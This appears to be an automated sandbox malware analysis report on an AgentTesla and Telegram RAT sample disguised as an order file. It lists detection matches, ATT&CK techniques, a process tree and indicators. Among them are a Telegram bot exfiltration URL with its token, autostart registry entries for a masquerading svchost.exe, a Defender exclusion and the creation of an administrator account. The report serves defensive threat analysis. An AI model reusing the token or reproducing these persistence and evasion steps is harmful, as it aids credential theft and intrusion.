                      Source: Yara match, File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000000.840897044.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000002.931663085.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000002.931619495.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000029.00000002.909583647.00000000040C5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4eab090.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4e74670.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000029.00000003.829188638.00000000043CE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Source: Yara match, File source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected Telegram RAT
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match, File source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match, File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR
                      Yara detected AgentTesla
                      Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 32.2.svchost.exe.470db20.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 31.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 37.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42a5900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 31.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 32.2.svchost.exe.46edb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 37.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 31.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 31.0.aspnet_regbrowsers.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.42c5920.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 37.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 31.0.aspnet_regbrowsers.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 36.2.svchost.exe.4aadb00.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 36.2.svchost.exe.4aedb20.2.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 31.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 37.0.aspnet_regbrowsers.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 37.0.aspnet_regbrowsers.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 32.2.svchost.exe.474db40.3.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 36.2.svchost.exe.4aadb00.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 37.0.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 32.2.svchost.exe.470db20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 36.2.svchost.exe.4aedb20.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 32.2.svchost.exe.474db40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4416ba0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.4305940.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0000003B.00000000.888165359.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000000.710933564.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000002F.00000000.788423328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000000.744599446.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000000.710472370.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000002F.00000002.931530989.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000002F.00000000.784941162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000002F.00000000.790295907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000000.744014270.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000000.710080019.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000034.00000000.817068526.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000002F.00000000.786765310.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000000.709643389.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000003B.00000000.890224140.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000003B.00000000.885768767.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000002.931661414.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000000.746142761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000020.00000002.779987071.000000000474D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000024.00000002.842251291.0000000004AED000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000030.00000002.927080316.0000000004715000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000038.00000000.845760653.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000003B.00000000.883261997.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000003B.00000002.932852897.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000034.00000000.814526101.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000038.00000000.843348334.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000026.00000002.886344519.0000000003C5D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000038.00000000.847213598.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000034.00000000.815839505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.734261757.000000000428D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000034.00000000.818834012.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000029.00000002.911408277.000000000413D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000038.00000000.840897044.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000038.00000002.931663085.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000034.00000002.931619495.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000029.00000002.909583647.00000000040C5000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000026.00000002.871462494.00000000038F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000002.754034850.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000030.00000002.927142303.000000000478D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4eab090.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0.3.#NEW ORDER FOR JANUARY 2022.exe.4e74670.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 0000003B.00000002.938179182.0000000002471000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000030.00000002.927387694.00000000049D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000024.00000003.773583087.0000000004B9C000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000038.00000002.938786458.0000000003511000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000029.00000003.829188638.00000000043CE000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000024.00000003.778067403.0000000004B45000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000000.00000003.705890791.0000000004E74000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000034.00000002.938600597.0000000002C41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: 0000002F.00000002.937902584.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: aspnet_regbrowsers.exe PID: 7068, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Source: Yara match; File source: Process Memory Space: aspnet_regbrowsers.exe PID: 4588, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Matrix columns (one tactic per column, listed here column by column; digits after a technique name are the report's matched-signature counters):

                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                      Execution: Windows Management Instrumentation 211; Scheduled Task/Job 1; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
                      Persistence: Create Account 1; Scheduled Task/Job 1; Registry Run Keys / Startup Folder 21; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                      Privilege Escalation: Process Injection 212; Scheduled Task/Job 1; Registry Run Keys / Startup Folder 21; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
                      Defense Evasion: Disable or Modify Tools 11; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 2; Software Packing 3; Timestomp 1; Masquerading 221; Virtualization/Sandbox Evasion 141; Process Injection 212; Hidden Users 1
                      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                      Discovery: File and Directory Discovery 1; System Information Discovery 113; Query Registry 1; Security Software Discovery 321; Process Discovery 2; Virtualization/Sandbox Evasion 141; Application Window Discovery 1; Network Service Scanning; System Network Connections Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
                      Collection: Archive Collected Data 11; Clipboard Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                      Command and Control: Web Service 1; Encrypted Channel 1; Non-Application Layer Protocol 1; Application Layer Protocol 1; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction

                      Behavior Graph

                      Behavior Graph ID: 553020
                      Sample: #NEW ORDER FOR JANUARY 2022.exe
                      Startdate: 14/01/2022
                      Architecture: WINDOWS
                      Score: 100

                      Network nodes reached from the sample: 192.168.2.1 (unknown, unknown); api.telegram.org

                      Signatures attached to the sample node: Multi AV Scanner detection for submitted file; Yara detected UAC Bypass using CMSTP; Yara detected AgentTesla; 15 other signatures

                      Process tree (graph node numbers in parentheses, graph counters as shown):

                      • #NEW ORDER FOR JANUARY 2022.exe (8; counters 5, 6)
                        Dropped: C:\Windows\Microsoft.NET\...\svchost.exe, PE32; C:\...\#NEW ORDER FOR JANUARY 2022.exe.log, ASCII
                        Signatures: Creates autostart registry keys with suspicious names; Creates an autostart registry key pointing to binary in C:\Windows; Writes to foreign memory regions; Adds a new user with administrator rights
                        • net.exe (18; counter 1)
                          • net1.exe (31; counter 1). Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                          • conhost.exe (34)
                        • aspnet_regbrowsers.exe (20). Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                        • net.exe (23; counter 1)
                          • conhost.exe (36)
                          • net1.exe (38; counter 1)
                        • 8 other processes (29)
                          • conhost.exe (42)
                          • conhost.exe (44)
                          • conhost.exe (46)
                          • 6 other processes (48)
                      • svchost.exe (12)
                        Signatures: Multi AV Scanner detection for dropped file; Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
                        • powershell.exe (25)
                          • conhost.exe (40)
                        • aspnet_regbrowsers.exe (27)
                      • svchost.exe (14)
                      • 2 other processes (16)

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      #NEW ORDER FOR JANUARY 2022.exe | 19% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | 19% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      37.2.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                      31.0.aspnet_regbrowsers.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
                      31.0.aspnet_regbrowsers.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
                      31.0.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                      37.0.aspnet_regbrowsers.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
                      31.0.aspnet_regbrowsers.exe.400000.2.unpack | 100% | Avira | TR/Spy.Gen8
                      37.0.aspnet_regbrowsers.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
                      31.0.aspnet_regbrowsers.exe.400000.3.unpack | 100% | Avira | TR/Spy.Gen8
                      31.2.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
                      37.0.aspnet_regbrowsers.exe.400000.1.unpack | 100% | Avira | TR/Spy.Gen8
                      37.0.aspnet_regbrowsers.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
                      37.0.aspnet_regbrowsers.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                      https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
                      http://DynDns.comDynDNS | 0% | URL Reputation | safe
                      http://tempuri.org/ | 0% | URL Reputation | safe
                      http://YsLVkm.com | 0% | Avira URL Cloud | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      api.telegram.org | 149.154.167.220 | true | false | (none) | high

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://127.0.0.1:HTTP/1.1 | aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                        https://api.ipify.org%GETMozilla/5.0 | aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | URL Reputation: safe | low
                        http://DynDns.comDynDNS | aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://tempuri.org/ | #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/sendDocumentdocument----- | aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | (none) | high
                        http://YsLVkm.com | aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | aspnet_regbrowsers.exe, 0000001F.00000002.755508340.00000000034D1000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000002.939713877.0000000002F11000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp | false | (none) | high
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
                        https://api.telegram.org/bot2030557675:AAF2CRvHF_rfT7tYXz9VN8YUb6kF5qxu_xg/ | svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000025.00000000.745218195.0000000000402000.00000040.00000001.sdmp | false | (none) | high

                              Contacted IPs


                              Public

                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                              (no public IPs contacted)

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version: 34.0.0 Boulder Opal
                              Analysis ID: 553020
                              Start date: 14.01.2022
                              Start time: 05:31:36
                              Joe Sandbox Product: CloudBasic
                              Overall analysis duration: 0h 14m 34s
                              Hypervisor based Inspection enabled: false
                              Report type: light
                              Sample file name: #NEW ORDER FOR JANUARY 2022.exe
                              Cookbook file name: default.jbs
                              Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes: 61
                              Number of new started drivers analysed: 0
                              Number of existing processes analysed: 0
                              Number of existing drivers analysed: 0
                              Number of injected processes analysed: 0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode: default
                              Analysis stop reason: Timeout
                              Detection: MAL
                              Classification: mal100.troj.expl.evad.winEXE@71/19@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 0.4% (good quality ratio 0.4%)
                              • Quality average: 82.1%
                              • Quality standard deviation: 20%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 20.54.110.249, 40.91.112.76
                              • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, s-ring.msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, t-ring.msedge.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, teams-ring.msedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes were analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              Time | Type | Description
                              05:32:32 | API Interceptor | 309x Sleep call for process: powershell.exe modified
                              05:32:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:32:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
                              05:33:03 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run HPQOEAM - f "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe"
                              05:33:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce CBCDCCADCFFABAADCAAEECC C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe
